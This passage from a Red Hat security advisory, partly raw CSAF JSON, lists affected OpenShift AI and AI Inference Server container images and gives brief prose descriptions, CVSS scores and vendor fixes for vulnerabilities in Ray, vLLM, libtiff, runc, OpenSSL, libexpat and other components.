"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "starlette: Starlette DoS via Range header merging"
}
]
}
RHSA-2025:23078
Vulnerability from csaf_redhat - Published: 2025-12-10 18:24 - Updated: 2026-05-24 14:51Summary
Red Hat Security Advisory: Red Hat AI Inference Server 3.2.2 (CUDA)
Severity
Important
Notes
Topic: Red Hat AI Inference Server 3.2.2 (CUDA) is now available.
Details: Red Hat® AI Inference Server
Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
A flaw was found in ray. The job submission API allows a remote attacker to execute arbitrary code due to insufficient input validation. An unauthenticated attacker can trigger this vulnerability by sending a malicious job submission request. Successful exploitation results in arbitrary code execution on the affected Ray cluster.
CWE-918 - Server-Side Request Forgery (SSRF)Affected products
Fixed
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64 | — |
Vendor Fix
fix
|
Threats
Impact
Important
An out-of-memory flaw was found in libtiff that could be triggered by passing a crafted tiff file to the TIFFRasterScanlineSize64() API. This flaw allows a remote attacker to cause a denial of service via a crafted input with a size smaller than 379 KB.
7.5 (High)
Affected products
Fixed
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64 | — |
Vendor Fix
fix
|
Threats
Impact
Moderate
A segment fault (SEGV) flaw was found in libtiff that could be triggered by passing a crafted tiff file to the TIFFReadRGBATileExt() API. This flaw allows a remote attacker to cause a heap-buffer overflow, leading to a denial of service.
7.5 (High)
Affected products
Fixed
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64 | — |
Vendor Fix
fix
|
Threats
Impact
Moderate
A flaw was found in shadow-utils. Affected versions of shadow-utils establish a default /etc/subuid behavior, for example, uid 100000 through 165535 for the first user account, that can conflict with the uids of users defined on locally administered networks. This issue potentially leads to account takeover by leveraging newuidmap for access to an NFS home directory or same-host resources for remote logins by these local network users.
CWE-1188 - Initialization of a Resource with an Insecure DefaultAffected products
Fixed
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64 | — |
Vendor Fix
fix
|
Threats
Impact
Low
A flaw was found in the libssh library in versions less than 0.11.2. An out-of-bounds read can be triggered in the sftp_handle function due to an incorrect comparison check that permits the function to access memory beyond the valid handle list and to return an invalid pointer, which is used in further processing. This vulnerability allows an authenticated remote attacker to potentially read unintended memory regions, exposing sensitive information or affect service behavior.
8.1 (High)
Affected products
Fixed
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64 | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Moderate
A Server-Side Request Forgery (SSRF) vulnerability exists in the MediaConnector class within the vLLM project's multimodal feature set. The load_from_url and load_from_url_async methods fetch and process media from user-provided URLs without adequate restrictions on the target hosts. This allows an attacker to coerce the vLLM server into making arbitrary requests to internal network resources.
7.1 (High)
Affected products
Fixed
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64 | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Important
A memory corruption flaw was found in SQLite. Under specific conditions a query can be generated where the number of aggregate terms could exceed the number of columns available. This issue could lead to memory corruption and subsequent unintended behavior.
7.7 (High)
Affected products
Fixed
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64 | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Important
A flaw was found in libtiff. The `get_histogram` function in `file/tiffmedian.c` exhibits a use-after-free condition when processing a specially crafted file, allowing a local attacker to trigger memory corruption. This manipulation results in a use-after-free vulnerability, and can lead to a denial of service.
7.8 (High)
Affected products
Fixed
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64 | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Important
A flaw was found in the OpenSSL CMS implementation (RFC 3211 KEK Unwrap). This vulnerability allows memory corruption, an application level denial of service, or potential execution of attacker-supplied code via crafted CMS messages using password-based encryption (PWRI).
5.6 (Medium)
Affected products
Fixed
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64 | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Moderate
A flaw was found in Libtiff. This vulnerability is a "write-what-where" condition, triggered when the library processes a specially crafted TIFF image file. By providing an abnormally large image height value in the file's metadata, an attacker can trick the library into writing attacker-controlled color data to an arbitrary memory location. This memory corruption can be exploited to cause a denial of service (application crash) or to achieve arbitrary code execution with the permissions of the user.
8.8 (High)
Affected products
Fixed
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64 | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Important
A flaw was found in the `golang.org/x/oauth2/jws` package in the token parsing component. This vulnerability is made possible because of the use of `strings.Split(token, ".")` to split JWT tokens, which can lead to excessive memory consumption when processing maliciously crafted tokens with a large number of `.` characters. An attacker could exploit this functionality by sending numerous malformed tokens and can trigger memory exhaustion and a Denial of Service.
7.5 (High)
Affected products
Fixed
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64 | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Important
A flaw was found in the golang.org/x/crypto/ssh package. SSH clients and servers are vulnerable to increased resource consumption, possibly leading to memory exhaustion and a DoS. This can occur during key exchange when the other party is slow to respond during key exchange.
7.5 (High)
Affected products
Fixed
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64 | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Important
A flaw was found in runc. CVE-2025-52565 is very similar in concept and application toCVE-2025-31133, except that it exploits a flaw in /dev/console bind-mounts. When creating the /dev/console bind-mount (to /dev/pts/$n), if an attacker replaces /dev/pts/$n with a symlink then runc will bind-mount the symlink target over /dev/console.
8.2 (High)
Affected products
Fixed
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64 | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Important
A path traversal flaw was found in Vim. Successful exploitation can lead to overwriting sensitive files or placing executable code in privileged locations, depending on the permissions of the process editing the archive.
4.1 (Medium)
Affected products
Fixed
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64 | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Moderate
A path traversal flaw was found in Vim. Successful exploitation can lead to overwriting sensitive files or placing executable code in privileged locations, depending on the permissions of the process editing the archive.
4.1 (Medium)
Affected products
Fixed
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64 | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Moderate
A memory amplification vulnerability in libexpat allows attackers to trigger excessive dynamic memory allocations by submitting specially crafted XML input. A small input (~250 KiB) can cause the parser to allocate hundreds of megabytes, leading to denial-of-service (DoS) through memory exhaustion.
5.3 (Medium)
Affected products
Fixed
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64 | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Important
A flaw was found in vLLM’s API token authentication logic, where token comparisons were not performed in constant time. This weakness could allow an attacker to exploit timing differences to guess valid tokens and bypass authentication.
7.5 (High)
Affected products
Fixed
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64 | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Important
A flaw was found in Ray’s HTTP API endpoint handling (e.g. /api/jobs, /api/job_agent/jobs/), which allows a remote attacker to trigger arbitrary code execution when a developer using Ray visits a malicious website in a vulnerable browser (e.g. Firefox or Safari). The root cause is an insufficient defense relying solely on the User-Agent header starting with “Mozilla”, which can be manipulated under the fetch specification — enabling a DNS-rebinding attack to bypass browser-based protections.
8.8 (High)
